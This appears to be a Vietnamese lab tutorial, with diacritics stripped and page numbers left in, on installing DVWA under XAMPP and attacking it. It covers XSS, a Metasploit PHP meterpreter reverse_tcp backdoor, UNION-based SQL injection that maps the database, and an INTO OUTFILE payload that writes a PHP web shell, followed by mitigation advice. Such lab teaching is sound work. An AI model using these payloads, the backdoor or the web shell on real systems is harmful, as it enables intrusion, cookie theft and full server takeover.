Sau cng l m trnh duyt web ln v g http://localhost ta s c giao din chnh ca XAMPP nh hnh bn di:

2. Ti v ci t DVWA

Cc chng ta vo link http://www.dvwa.co.uk/ ti DVWA v my

88

Sau tin hnh gii nn file va download v v t vo th mc /opt/lampp/htdocs/

Vo trnh duyt web v g http://localhost/dvwa/ ta c giao din chnh ca DVWA nh sau :

89

Ch : Phi bt XAMPP ln trc th mi c th chy DVWA. Ti giao din ng nhp ca DVWA, cc chng ta ng nhp bng acc/pass mc nh l admin/password. Chun b trc khi tn cng: M trnh duyt web, g: localhost/dvwa. C th s dng dia_chi_ip/dvwa

90

khai thc cc li trn DVWA(XSS, SQL Injection), chng ta phi thit lp Security Level l Low. V khi , nhng on code c thm vo s c gi nguyn. Vi mc High, s dng hm htmlspecialchars() chuyn cc k t c bit, khng ging vi lc nhp ban u. mc Medium, chui <script> s b xa i nn khng bi nh hng. Tuy nhin, cc th html khc vn b nh hng bnh thng. V th chng ta thit lp Security Level l low: Chn DVWA Security -> Low -> Submit

91

III. Cc k thut tn cng trn DVWA


1. XSS (Cross-Site Scripting)
a) Gii thiu

Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS trnh nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng bng cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay nhng on m script nguy him c th gy nguy hi cho nhng ngi s dng khc. Trong , nhng on m nguy him c chn vo hu ht c vit bng cc Client-Site Script nh JavaScript, JScript, DHTML v cng c th l c cc th HTML. XSS l mt trong nhng li ph bin, c rt nhiu trang web b mc phi li ny, chnh v th ngy cng c nhiu ngi quan tm n li ny!
b) Phn loi XSS

XSS c th c phn loi nh sau: Stored XSS Attacks

Stored XSS l hnh thc tn cng m cho php k tn cng c th chn mt on script nguy him (thng l Javascript) vo website ca chng ta thng qua mt chc nng no (vd: vit li bnh, guestbook, gi bi..), t khi cc thnh vin khc truy cp website s b dnh m c t k tn cng ny, cc m c ny thng c lu li trong database ca website chng ta nn gi l Stored. Stored XSS pht sinh do chng ta khng lc d liu do thnh vin gi ln mt cch ng n, khin cho m c c lu vo Database ca website. 92

Reflected XSS Attacks

Trong hnh thc ny, k tn cng thng gn thm on m c vo URL ca website chng ta v gi n nn nhn, nu nn nhn truy cp URL th s b dnh m c. iu ny xy ra do ta khng ch filter input t URL ca website mnh. XSS Attack Consequences Phng php ny tng t nh 2 phng php trn. Tuy nhin, im khc bit l cch m payload c a ti server. Mt site read only hay brochureware cng c thn him XSS. XSS c th gy thit hi t mc nh n ln nh vic chim ti khon ca ngi s dng. Mt cuc tn cng XSS c th ly c session cookie, gy mt ti khon s dng. Hoc c th nh hng ti d liu ngi dng u cui bng cch ci t Trojan, hoc redirect trang web ngi truy cp sang mt trang khc, hoc thay i ni dung ca mt trang.
c) Tm hiu v hot ng XSS

V c bn, hot ng ca XSS c th c m t nh sau:

93

M t hot ng ca XSS Theo nguyn tc trn, mt hacker c th li dng cc l hng bo mt t mt website. Cc th HTML u c th l cng c cho cc cuc tn cng bi k thut XSS, trong 2 th IMG v IFRAME c th cho php trnh duyt load thm cc website khc khi cc lnh HTML c hin th. Li dng nguyn tc ny, cc hacker c th chn cc on m c vo v khin my nn nhn b tn cng XSS
d) Tc hi ca XSS

XSS thng c s dng vi cc mc ch sau: nh cp thng tin Gip hacker c th truy cp c vo nhng thng tin nhy cm Ly c quyn truy cp min ph vo nhng ni dung ng ra phi tr tinmi c c D xt s thch ca ngi s dng mng Thay i din mo ( deface) mt trang web no Tn cng t chi dch v (DoS) M JavaScript c c th truy cp bt c thng tin no sau y: - Cookie c nh (ca site b li XSS) c duy tr bi trnh duyt. - RAM Cookie (ca site b li XSS). - Tn ca tt c cc ca s c m t site b li XSS. - Bt c thng tin m c th truy cp c t DOM hin ti (nh value, m HTML).

94

e) Tn cng XSS

Thc hin script: <script>alert(XSS); </script> hin thng bo trn trnh duyt web

Kt qu nhn c thay v ch lu vo c s d liu:

Xem cookie ca ngi dng: <script>alert(document.cookie); </script>

95

Chng ta c th gi cookie ny v trc tip my tn cng thay v ch hin ln mn hnh. Chng ta c th chn cc th iframe vo: <iframe src=http://www.ctu.edu.vn></iframe>

Ngoi ra, chng ta c th s dng Metasploit Framework (gii thiu trn) tn cng chim quyn iu khin cng vi backdoor cho php my tnh mc tiu kt ni li. Code to backdoor: Msfpayload php/meterperter/reverse_tcp lhost=192.168.10.102 lport=4444 R > forum.php 96

Dng msfconsole v thit lp cc thng s cn thit lng nghe kt ni trn server:

Tr li XSS Stored, ta s dng script: 97

<script> Windows. </script>

Sau khi thc thi script trn xong, Metasploit Framework m kt ni n v chng ta c th tn cng.

Mt s hnh nh tn cng:

98

99

f) Mt s phng php phng nga v ngn chn

Ngi ta khng lng ht c mc nguy him ca XSS nhng cng khng qu kh khn ngn nga XSS. C rt nhiu cch c th gii quyt vn ny. OWASP (The Open Web Application Standard Project) ni rng c th xy dng cc website bo mt cao, i vi cc d liu ca ngi s dng, nn: Ch chp nhn nhng d liu hp l. T chi nhn cc d liu hng. Lin tc kim tra v thanh lc d liu. Nhng ngi pht trin web c th bo v website ca mnh khi b li dng thng qua tn cng XSS, bng cch m bo nhng trang pht sinh ng khng cha cc tag ca script bng cch lc v xc nhn hp l cc d liu u vo t pha ngi dng hoc m ha(endcoding) v lc cc gi tr xut cho ngi dng.
2. SQL Injection
a) SQL Injection l g?

SQL Injection l mt trong nhng kiu hack web ang dn tr nn ph bin hin nay. Bng cch inject cc m SQL query/command vo input trc khi chuyn cho ng dng web x l, chng ta c th login m khng cn username v password, remote execution, dump data v ly root ca SQL server. Cng c dng tn cng l mt trnh duyt web bt k, chng hn nh Internet Explorer, Firefox, Google Chrome, ... 100

b) Cc bc khai thc l hng trang web

Vo trang http://localhost/dvwa/, chn SQL Injection (Blind):

Chng ta bt u khai thc li t nhp liu User ID: Nhp vo: 1

Nu nhp vo:1 or 1=1hoc 1 or =#ta c kt qu rt bt ng

101

Du # c s dng loi b tc dng ca du () sau cng trong cu lnh truy vn sql: SELECT first_name, last_name FROM users WHERE user_id = $user_id Xem tn c d liu: a UNION select 1, database();#

Xem user v system user: a UNION select system_user(), user();#

102

Xc nh tn user m ngi dng ang s dng v phin bn ca MySQL

Xem tt c cc tn c s d liu cng cc bng c trong h qun tr csdl MySQL: a UNION select information_schema.tables;# table_schema, table_name, from

Chng ta c th thm mnh iu kin WHERE gii hn li kt qu a UNION select table_schema, table_name, from information_schema.tables where table_schema=dvwa;# 103

Lit k cc column trong bng: a UNION select table_name, column_name, information_schema.columns where table_schema=dvwa;# from

Tip tc thc hin cu lnh sau:


' union select '','<?php $print=shell_exec($_GET["cmd"]); "<pre>$print</pre>"; ?>' into outfile C:\\xampp\\htdocs\\sqlinjection.php' ;# echo

Sau khi tao xong, chng ta ch cn thc hin lnh trn trnh duyt, pha sau chui ?cmd=cu lnh. V d: 192.168.10.20/sqlinjection.php?cmd=dirta c:

104

By gi ta c ton quyn iu khin my tnh ca victim.


a) Cc phng n phng chng SQL Injection

i password mc nh ca user root Xo tt c cc th tc c mc nh lu tr trn server Lc nhng k t c th gy hi nh ,,,:,# ngay t khi nhn yu cu truy vn t bn ngoi Update SQL vi nhng bn mi nht Kho cc t kha nhy cm i vi SQL bng cch dng firewall chn ngay t u vo M ha password Loi b nhng t kha SELECT, DELETE, INSERT, trong cu truy vn t bn ngoi.

105

TI LIU THAM KHO


[1] McGraw Hill Osborne,Media Hacking Exposed Sixth Edition Network Security Secrets And SolutionsJan 2009 [2] Gordon Fyodor Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning [3] www.wikipedia.org [4] www.google.com.vn

106